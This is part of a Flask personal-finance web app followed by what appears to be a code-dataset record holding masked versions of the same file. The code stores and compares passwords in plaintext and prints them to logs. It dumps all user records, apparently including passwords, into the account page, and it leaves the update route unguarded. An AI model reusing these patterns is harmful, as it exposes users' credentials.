            percent=(modict[names[0]]*12)/goal[0][1]
        if names[0] in dadict:
            percent=(dadict[names[0]]*30*12)/goal[0][1]
        if names[1]<=6 and percent >=0.05:
            ratings[names[0]]=(names[1],percent)
    print(ratings)
    return render_template('area.html',idnum=user_id,ratings=ratings)
@app.route('/logout')
def logout():
    """Sign the current user out (no-op when nobody is signed in)."""
    session.pop('username', None)
    return redirect(url_for('home'))
@app.route('/account')
def account():
    """Render the account-settings page.

    NOTE(review): serializes EVERY user row (ret_all=True) into the page,
    which appears to include stored passwords -- confirm this is intended.
    """
    if 'username' not in session:
        flash("You must be logged in to access this page")
        return redirect(url_for('login'))
    # print(db.search_user_list(session['username']))
    user_list = json.dumps(db.search_user_list(ret_all=True))
    print(json.dumps(db.search_user_list(ret_all=True)))
    return render_template('accounts.html', user_list=user_list)
@app.route('/update', methods=["POST"])
def update():
    """Apply account changes posted from the settings page.

    'all-options' is a JSON object with 'username', 'password' (either may
    be falsy to keep the current value) and a 'reset' statistics flag.
    """
    # NOTE(review): no login guard here, unlike the other routes -- confirm.
    print('this is the updates')
    update_dict = request.form['all-options']
    update_dict = json.loads(update_dict)
    print(request.form)
    user_ids = db.search_user_list(session['username'])
    user = user_ids[0][-1]
    print(user)
    # Empty fields fall back (via `or`) to the current stored values.
    db.update_user_list(update_dict['username'] or user_ids[0][0], update_dict['password'] or user_ids[0][1], user)
    db.reset_statistics(user, update_dict['reset'])
    session.pop('username')
    session['username'] = update_dict['username'] or user_ids[0][0] # change username in session
    flash("Account information updated successfully")
    return redirect(url_for('home'))
@app.route('/del')
def delete():
    """Remove the logged-in user's account and end the session."""
    if 'username' not in session:
        flash("Woops. You can't be here")
        return redirect(url_for('login'))
    # Internal user id is the last column of the user record.
    record_id = db.search_user_list(session['username'])[0][-1]
    print(record_id)
    db.update_user_list(None, None, record_id, rem=True)
    session.pop('username')
    flash("User successfully removed")
    return redirect(url_for('home'))
# Start the development server only when this file is run directly,
# not when it is imported as a module.
if __name__ == "__main__":
    app.debug = True  # enable Flask debug mode (interactive debugger on errors)
    app.run()
|
normal
|
{
"blob_id": "5c20eefe8111d44a36e69b873a71377ee7bfa23d",
"index": 6768,
"step-1": "<mask token>\n\n\[email protected]('/')\ndef home():\n if 'username' in session:\n id_num = db.search_user_list(session['username'], is_usrname=True)[0][2\n ]\n finavail = db.search_finance_list(id_num)\n goalavail = db.search_goal_list(id_num)\n if finavail:\n session['finances'] = session['username']\n if goalavail:\n session['goals'] = session['username']\n set_goal = db.search_goal_list(id_num)\n print(set_goal)\n if set_goal != []:\n user_id = db.search_user_list(session['username'], is_usrname=True\n )[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now),\n '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('home.html', fin=finavail, goal=\n goalavail, set_goal=set_goal, goal_name=g,\n goal_price=price, perc_inc=perc, image=img, bal=bal,\n income=inc, months=delta_months, 
perc_comp=\n perc_complete * 100)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html')\n\n\n<mask token>\n\n\[email protected]('/login')\ndef login():\n return render_template('login.html')\n\n\[email protected]('/auth', methods=['POST'])\ndef auth():\n user = request.form.get('user')\n paswrd = request.form.get('pass')\n if request.form.get('submit') == 'Register':\n paswrd2 = request.form.get('pass2')\n print(paswrd)\n print(paswrd2)\n if paswrd != paswrd2:\n flash('Passwords Do Not Match')\n return redirect(url_for('register'))\n if db.register(user, paswrd):\n flash('Registered successfully')\n session['username'] = request.form['user']\n else:\n flash('Unable to register the user')\n return redirect(url_for('register'))\n print('Username has been registered previously!')\n else:\n match = db.search_user_list(user, is_usrname=True)\n if len(match) > 0:\n if match[0][1] == paswrd:\n session['username'] = request.form['user']\n else:\n flash('wrong Password')\n return redirect(url_for('login'))\n else:\n flash('User not found')\n return redirect(url_for('login'))\n return redirect(url_for('home'))\n\n\[email protected]('/finances')\ndef finance():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n items = db.search_finance_list(user_id)\n daily = db.search_expense_list(user_id, is_id=True)\n monthly = db.search_monthly_list(user_id, is_id=True)\n ratings = db.search_rating_list(user_id, is_id=True)\n print(ratings)\n print(f'Unlike month, this is daily: {daily}\\n')\n w = dict([(x[0], x[1]) for x in daily])\n s = dict([(x[0], x[1]) for x in monthly])\n r = dict([(x[0], x[1]) for x in ratings])\n print(f'THIS is monthly: {monthly}')\n print(f'THIS is s: {s}')\n print(f'These are the ratings: {r}')\n total = 0\n 
m_total = 0\n for x in w.values():\n total += float(x)\n for x in s.values():\n m_total += float(x)\n if items != []:\n bal, income, i = items[0]\n diction = {'Balance': bal, 'Income': income}\n return render_template('findata.html', diction=diction, daily=w,\n months=s, total=total, mtotal=m_total, completed=True, ratings=r)\n return render_template('findata.html')\n\n\[email protected]('/fincalc', methods=['POST'])\ndef calc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n session['finances'] = session['username']\n bal = request.form['balance'][1:]\n monthly = request.form['monthly-inputs']\n income = request.form['income'][1:]\n s = request.form\n d_rates = request.form['daily-importance']\n m_rates = request.form['monthly-importance']\n print(d_rates)\n user_id = db.search_user_list(session['username'])[0][2]\n daily_dict = json.loads(d_rates)\n monthly_dict = json.loads(m_rates)\n print(daily_dict)\n print(monthly_dict)\n dai_im = dict([x for x in daily_dict.values()])\n mon_im = dict([x for x in monthly_dict.values()])\n file = os.path.dirname(__file__) + f'/static/ratings.csv'\n stringg = '{'\n try:\n with open(file) as f:\n print('File found, not creating...')\n f.close()\n except Exception as e:\n print(e)\n with open(file, 'a+') as f:\n print('File not found, creating...')\n f.write(f'ratings,id\\n')\n f.close()\n for item in mon_im:\n db.add_rating(item, mon_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(mon_im[item]\n ) + \"'\" + ' '\n for item in dai_im:\n db.add_rating(item, dai_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(dai_im[item]\n ) + \"'\" + ' '\n stringg += '},' + str(user_id) + '\\n'\n with open(file, 'r') as f:\n lines = f.readlines()\n with open(file, 'w') as f:\n for line in lines:\n if str(user_id) != line.strip('\\n').split(',')[1]:\n f.write(line)\n f.write(stringg)\n f.close()\n daily = 
request.form['all-inputs']\n print(f'This is daily: {monthly}')\n daily = json.loads(daily)\n monthly = json.loads(monthly)\n print(f'This is daily now {monthly}')\n w = dict([x for x in daily.values()])\n m = dict([x for x in monthly.values()])\n print(f'\\nThis is calculated m:{m}\\n')\n db.add_finances(bal, m, income, w, user_id)\n flash('Finances updated')\n return redirect(url_for('home'))\n\n\[email protected]('/goals')\ndef goals():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now), '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img, bal=bal, 
income=inc, months=\n delta_months, perc_comp=perc_complete * 100)\n else:\n print('Used the second')\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img)\n elif b:\n return render_template('goals.html', bal=bal, income=inc)\n else:\n return render_template('goals.html')\n\n\[email protected]('/gcalc', methods=['POST'])\ndef gcalc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n goal_name = request.form['goal']\n goal_price = request.form['goal_price'][1:]\n percentage = request.form['slide']\n print('This is percentage:')\n print(percentage)\n print('gcalc')\n print(goal_name)\n print(goal_price)\n user_id = db.search_user_list(session['username'])[0][2]\n db.add_goals(goal_name, goal_price, percentage, user_id)\n a = db.search_image_list(user_id)\n print(a)\n if a == [] or a[0][2] != goal_name:\n try:\n l = urllib.request.urlopen(PIXABAY_STUB + goal_name.replace(' ',\n '+') + '&image_type=photo')\n p = json.loads(l.read())\n img = p['hits'][0]['webformatURL']\n except:\n return render_template('error.html', err=\n 'Cannot connect to API', fix=\n 'Try refreshing or contacting the site owner')\n else:\n img = a[0][1]\n db.add_images(img, goal_name, user_id)\n flash(f'Goal for {goal_name} at ${goal_price} has been added!')\n return redirect(url_for('home'))\n\n\[email protected]('/sankey')\ndef sankey():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('sankey.html', idnum=user_id)\n\n\[email protected]('/pie')\ndef pie():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('pie.html', idnum=user_id)\n\n\[email protected]('/area')\ndef area():\n if 
'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n goal = db.search_goal_list(user_id)\n if goal == []:\n return redirect(url_for('goals'))\n daily = db.search_expense_list(user_id)\n monthly = db.search_monthly_list(user_id)\n dadict = {}\n modict = {}\n print(goal)\n ratings = {}\n for names in daily:\n dadict[names[0]] = names[1]\n for names in monthly:\n modict[names[0]] = names[1]\n print(dadict, modict)\n percent = 0\n for names in db.search_rating_list(user_id):\n print(names)\n if names[0] in modict:\n percent = modict[names[0]] * 12 / goal[0][1]\n if names[0] in dadict:\n percent = dadict[names[0]] * 30 * 12 / goal[0][1]\n if names[1] <= 6 and percent >= 0.05:\n ratings[names[0]] = names[1], percent\n print(ratings)\n return render_template('area.html', idnum=user_id, ratings=ratings)\n\n\[email protected]('/logout')\ndef logout():\n if 'username' in session:\n session.pop('username')\n return redirect(url_for('home'))\n\n\[email protected]('/account')\ndef account():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_list = json.dumps(db.search_user_list(ret_all=True))\n print(json.dumps(db.search_user_list(ret_all=True)))\n return render_template('accounts.html', user_list=user_list)\n\n\[email protected]('/update', methods=['POST'])\ndef update():\n print('this is the updates')\n update_dict = request.form['all-options']\n update_dict = json.loads(update_dict)\n print(request.form)\n user_ids = db.search_user_list(session['username'])\n user = user_ids[0][-1]\n print(user)\n db.update_user_list(update_dict['username'] or user_ids[0][0], \n update_dict['password'] or user_ids[0][1], user)\n db.reset_statistics(user, update_dict['reset'])\n session.pop('username')\n session['username'] = update_dict['username'] or user_ids[0][0]\n flash('Account 
information updated successfully')\n return redirect(url_for('home'))\n\n\[email protected]('/del')\ndef delete():\n if 'username' not in session:\n flash(\"Woops. You can't be here\")\n return redirect(url_for('login'))\n user = db.search_user_list(session['username'])[0][-1]\n print(user)\n db.update_user_list(None, None, user, rem=True)\n flash('User successfully removed')\n session.pop('username')\n return redirect(url_for('home'))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/')\ndef home():\n if 'username' in session:\n id_num = db.search_user_list(session['username'], is_usrname=True)[0][2\n ]\n finavail = db.search_finance_list(id_num)\n goalavail = db.search_goal_list(id_num)\n if finavail:\n session['finances'] = session['username']\n if goalavail:\n session['goals'] = session['username']\n set_goal = db.search_goal_list(id_num)\n print(set_goal)\n if set_goal != []:\n user_id = db.search_user_list(session['username'], is_usrname=True\n )[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now),\n '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('home.html', fin=finavail, goal=\n goalavail, set_goal=set_goal, goal_name=g,\n goal_price=price, perc_inc=perc, image=img, bal=bal,\n income=inc, months=delta_months, 
perc_comp=\n perc_complete * 100)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html')\n\n\[email protected]('/register')\ndef register():\n return render_template('register.html')\n\n\[email protected]('/login')\ndef login():\n return render_template('login.html')\n\n\[email protected]('/auth', methods=['POST'])\ndef auth():\n user = request.form.get('user')\n paswrd = request.form.get('pass')\n if request.form.get('submit') == 'Register':\n paswrd2 = request.form.get('pass2')\n print(paswrd)\n print(paswrd2)\n if paswrd != paswrd2:\n flash('Passwords Do Not Match')\n return redirect(url_for('register'))\n if db.register(user, paswrd):\n flash('Registered successfully')\n session['username'] = request.form['user']\n else:\n flash('Unable to register the user')\n return redirect(url_for('register'))\n print('Username has been registered previously!')\n else:\n match = db.search_user_list(user, is_usrname=True)\n if len(match) > 0:\n if match[0][1] == paswrd:\n session['username'] = request.form['user']\n else:\n flash('wrong Password')\n return redirect(url_for('login'))\n else:\n flash('User not found')\n return redirect(url_for('login'))\n return redirect(url_for('home'))\n\n\[email protected]('/finances')\ndef finance():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n items = db.search_finance_list(user_id)\n daily = db.search_expense_list(user_id, is_id=True)\n monthly = db.search_monthly_list(user_id, is_id=True)\n ratings = db.search_rating_list(user_id, is_id=True)\n print(ratings)\n print(f'Unlike month, this is daily: {daily}\\n')\n w = dict([(x[0], x[1]) for x in daily])\n s = dict([(x[0], x[1]) for x in monthly])\n r = dict([(x[0], x[1]) for x in ratings])\n print(f'THIS is monthly: {monthly}')\n 
print(f'THIS is s: {s}')\n print(f'These are the ratings: {r}')\n total = 0\n m_total = 0\n for x in w.values():\n total += float(x)\n for x in s.values():\n m_total += float(x)\n if items != []:\n bal, income, i = items[0]\n diction = {'Balance': bal, 'Income': income}\n return render_template('findata.html', diction=diction, daily=w,\n months=s, total=total, mtotal=m_total, completed=True, ratings=r)\n return render_template('findata.html')\n\n\[email protected]('/fincalc', methods=['POST'])\ndef calc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n session['finances'] = session['username']\n bal = request.form['balance'][1:]\n monthly = request.form['monthly-inputs']\n income = request.form['income'][1:]\n s = request.form\n d_rates = request.form['daily-importance']\n m_rates = request.form['monthly-importance']\n print(d_rates)\n user_id = db.search_user_list(session['username'])[0][2]\n daily_dict = json.loads(d_rates)\n monthly_dict = json.loads(m_rates)\n print(daily_dict)\n print(monthly_dict)\n dai_im = dict([x for x in daily_dict.values()])\n mon_im = dict([x for x in monthly_dict.values()])\n file = os.path.dirname(__file__) + f'/static/ratings.csv'\n stringg = '{'\n try:\n with open(file) as f:\n print('File found, not creating...')\n f.close()\n except Exception as e:\n print(e)\n with open(file, 'a+') as f:\n print('File not found, creating...')\n f.write(f'ratings,id\\n')\n f.close()\n for item in mon_im:\n db.add_rating(item, mon_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(mon_im[item]\n ) + \"'\" + ' '\n for item in dai_im:\n db.add_rating(item, dai_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(dai_im[item]\n ) + \"'\" + ' '\n stringg += '},' + str(user_id) + '\\n'\n with open(file, 'r') as f:\n lines = f.readlines()\n with open(file, 'w') as f:\n for line in lines:\n if str(user_id) != 
line.strip('\\n').split(',')[1]:\n f.write(line)\n f.write(stringg)\n f.close()\n daily = request.form['all-inputs']\n print(f'This is daily: {monthly}')\n daily = json.loads(daily)\n monthly = json.loads(monthly)\n print(f'This is daily now {monthly}')\n w = dict([x for x in daily.values()])\n m = dict([x for x in monthly.values()])\n print(f'\\nThis is calculated m:{m}\\n')\n db.add_finances(bal, m, income, w, user_id)\n flash('Finances updated')\n return redirect(url_for('home'))\n\n\[email protected]('/goals')\ndef goals():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now), '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return 
render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img, bal=bal, income=inc, months=\n delta_months, perc_comp=perc_complete * 100)\n else:\n print('Used the second')\n return render_template('goals.html', goal=g, goal_price=price,\n perc_inc=perc, image=img)\n elif b:\n return render_template('goals.html', bal=bal, income=inc)\n else:\n return render_template('goals.html')\n\n\[email protected]('/gcalc', methods=['POST'])\ndef gcalc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n goal_name = request.form['goal']\n goal_price = request.form['goal_price'][1:]\n percentage = request.form['slide']\n print('This is percentage:')\n print(percentage)\n print('gcalc')\n print(goal_name)\n print(goal_price)\n user_id = db.search_user_list(session['username'])[0][2]\n db.add_goals(goal_name, goal_price, percentage, user_id)\n a = db.search_image_list(user_id)\n print(a)\n if a == [] or a[0][2] != goal_name:\n try:\n l = urllib.request.urlopen(PIXABAY_STUB + goal_name.replace(' ',\n '+') + '&image_type=photo')\n p = json.loads(l.read())\n img = p['hits'][0]['webformatURL']\n except:\n return render_template('error.html', err=\n 'Cannot connect to API', fix=\n 'Try refreshing or contacting the site owner')\n else:\n img = a[0][1]\n db.add_images(img, goal_name, user_id)\n flash(f'Goal for {goal_name} at ${goal_price} has been added!')\n return redirect(url_for('home'))\n\n\[email protected]('/sankey')\ndef sankey():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n return render_template('sankey.html', idnum=user_id)\n\n\[email protected]('/pie')\ndef pie():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n 
return render_template('pie.html', idnum=user_id)\n\n\[email protected]('/area')\ndef area():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n goal = db.search_goal_list(user_id)\n if goal == []:\n return redirect(url_for('goals'))\n daily = db.search_expense_list(user_id)\n monthly = db.search_monthly_list(user_id)\n dadict = {}\n modict = {}\n print(goal)\n ratings = {}\n for names in daily:\n dadict[names[0]] = names[1]\n for names in monthly:\n modict[names[0]] = names[1]\n print(dadict, modict)\n percent = 0\n for names in db.search_rating_list(user_id):\n print(names)\n if names[0] in modict:\n percent = modict[names[0]] * 12 / goal[0][1]\n if names[0] in dadict:\n percent = dadict[names[0]] * 30 * 12 / goal[0][1]\n if names[1] <= 6 and percent >= 0.05:\n ratings[names[0]] = names[1], percent\n print(ratings)\n return render_template('area.html', idnum=user_id, ratings=ratings)\n\n\[email protected]('/logout')\ndef logout():\n if 'username' in session:\n session.pop('username')\n return redirect(url_for('home'))\n\n\[email protected]('/account')\ndef account():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_list = json.dumps(db.search_user_list(ret_all=True))\n print(json.dumps(db.search_user_list(ret_all=True)))\n return render_template('accounts.html', user_list=user_list)\n\n\[email protected]('/update', methods=['POST'])\ndef update():\n print('this is the updates')\n update_dict = request.form['all-options']\n update_dict = json.loads(update_dict)\n print(request.form)\n user_ids = db.search_user_list(session['username'])\n user = user_ids[0][-1]\n print(user)\n db.update_user_list(update_dict['username'] or user_ids[0][0], \n update_dict['password'] or user_ids[0][1], user)\n db.reset_statistics(user, update_dict['reset'])\n 
session.pop('username')\n session['username'] = update_dict['username'] or user_ids[0][0]\n flash('Account information updated successfully')\n return redirect(url_for('home'))\n\n\[email protected]('/del')\ndef delete():\n if 'username' not in session:\n flash(\"Woops. You can't be here\")\n return redirect(url_for('login'))\n user = db.search_user_list(session['username'])[0][-1]\n print(user)\n db.update_user_list(None, None, user, rem=True)\n flash('User successfully removed')\n session.pop('username')\n return redirect(url_for('home'))\n\n\n<mask token>\n",
"step-3": "<mask token>\nif template_path != '/templates':\n app = Flask('__main__', template_folder=os.path.dirname(__file__) +\n '/templates', static_folder=os.path.dirname(__file__) + '/static')\n file = open(os.path.dirname(__file__) + '/data/keys.json')\nelse:\n app = Flask('__main__')\n file = open('./data/keys.json')\n<mask token>\n\n\[email protected]('/')\ndef home():\n if 'username' in session:\n id_num = db.search_user_list(session['username'], is_usrname=True)[0][2\n ]\n finavail = db.search_finance_list(id_num)\n goalavail = db.search_goal_list(id_num)\n if finavail:\n session['finances'] = session['username']\n if goalavail:\n session['goals'] = session['username']\n set_goal = db.search_goal_list(id_num)\n print(set_goal)\n if set_goal != []:\n user_id = db.search_user_list(session['username'], is_usrname=True\n )[0][2]\n g = db.search_goal_list(user_id)\n b = db.search_finance_list(user_id)\n t = db.search_time_list(user_id)\n date_now = datetime.date.today()\n price = g\n perc = g\n delta_months = 0\n if g != []:\n g = g[0][0]\n if price != []:\n price = price[0][1]\n if perc != []:\n perc = perc[0][2]\n\n def months_between(date1, date2):\n if date1 > date2:\n date1, date2 = date2, date1\n m1 = date1.year * 12 + date1.month\n m2 = date2.year * 12 + date2.month\n months = m2 - m1\n if date1.day > date2.day:\n months -= 1\n elif date1.day == date2.day:\n seconds1 = date1.hour * 3600 + date1.minute + date1.second\n seconds2 = date2.hour * 3600 + date2.minute + date2.second\n if seconds1 > seconds2:\n months -= 1\n return months\n if t != []:\n t = t[0][0]\n delta_months = months_between(datetime.datetime.strptime(t,\n '%Y-%m-%d'), datetime.datetime.strptime(str(date_now),\n '%Y-%m-%d'))\n print(delta_months)\n img = db.search_image_list(user_id)\n if img != []:\n img = img[0][0]\n if b != []:\n bal = b[0][0]\n inc = b[0][1]\n print(b)\n print(g)\n print(price)\n print(perc)\n print(img)\n if g or price:\n if b:\n print('Used the first one')\n 
perc_complete = delta_months * (perc / 100.0) * inc / price\n print(perc_complete)\n if perc_complete > 1:\n perc_complete = 1\n return render_template('home.html', fin=finavail, goal=\n goalavail, set_goal=set_goal, goal_name=g,\n goal_price=price, perc_inc=perc, image=img, bal=bal,\n income=inc, months=delta_months, perc_comp=\n perc_complete * 100)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html', fin=finavail, goal=goalavail)\n return render_template('home.html')\n\n\[email protected]('/register')\ndef register():\n return render_template('register.html')\n\n\[email protected]('/login')\ndef login():\n return render_template('login.html')\n\n\[email protected]('/auth', methods=['POST'])\ndef auth():\n user = request.form.get('user')\n paswrd = request.form.get('pass')\n if request.form.get('submit') == 'Register':\n paswrd2 = request.form.get('pass2')\n print(paswrd)\n print(paswrd2)\n if paswrd != paswrd2:\n flash('Passwords Do Not Match')\n return redirect(url_for('register'))\n if db.register(user, paswrd):\n flash('Registered successfully')\n session['username'] = request.form['user']\n else:\n flash('Unable to register the user')\n return redirect(url_for('register'))\n print('Username has been registered previously!')\n else:\n match = db.search_user_list(user, is_usrname=True)\n if len(match) > 0:\n if match[0][1] == paswrd:\n session['username'] = request.form['user']\n else:\n flash('wrong Password')\n return redirect(url_for('login'))\n else:\n flash('User not found')\n return redirect(url_for('login'))\n return redirect(url_for('home'))\n\n\[email protected]('/finances')\ndef finance():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n user_id = db.search_user_list(session['username'])[0][2]\n items = db.search_finance_list(user_id)\n daily = db.search_expense_list(user_id, is_id=True)\n monthly = 
db.search_monthly_list(user_id, is_id=True)\n ratings = db.search_rating_list(user_id, is_id=True)\n print(ratings)\n print(f'Unlike month, this is daily: {daily}\\n')\n w = dict([(x[0], x[1]) for x in daily])\n s = dict([(x[0], x[1]) for x in monthly])\n r = dict([(x[0], x[1]) for x in ratings])\n print(f'THIS is monthly: {monthly}')\n print(f'THIS is s: {s}')\n print(f'These are the ratings: {r}')\n total = 0\n m_total = 0\n for x in w.values():\n total += float(x)\n for x in s.values():\n m_total += float(x)\n if items != []:\n bal, income, i = items[0]\n diction = {'Balance': bal, 'Income': income}\n return render_template('findata.html', diction=diction, daily=w,\n months=s, total=total, mtotal=m_total, completed=True, ratings=r)\n return render_template('findata.html')\n\n\[email protected]('/fincalc', methods=['POST'])\ndef calc():\n if 'username' not in session:\n flash('You must be logged in to access this page')\n return redirect(url_for('login'))\n session['finances'] = session['username']\n bal = request.form['balance'][1:]\n monthly = request.form['monthly-inputs']\n income = request.form['income'][1:]\n s = request.form\n d_rates = request.form['daily-importance']\n m_rates = request.form['monthly-importance']\n print(d_rates)\n user_id = db.search_user_list(session['username'])[0][2]\n daily_dict = json.loads(d_rates)\n monthly_dict = json.loads(m_rates)\n print(daily_dict)\n print(monthly_dict)\n dai_im = dict([x for x in daily_dict.values()])\n mon_im = dict([x for x in monthly_dict.values()])\n file = os.path.dirname(__file__) + f'/static/ratings.csv'\n stringg = '{'\n try:\n with open(file) as f:\n print('File found, not creating...')\n f.close()\n except Exception as e:\n print(e)\n with open(file, 'a+') as f:\n print('File not found, creating...')\n f.write(f'ratings,id\\n')\n f.close()\n for item in mon_im:\n db.add_rating(item, mon_im[item], user_id)\n stringg += \"'\" + item + \"'\" + ' : ' + \"'\" + str(mon_im[item]\n ) + \"'\" + ' '\n for 
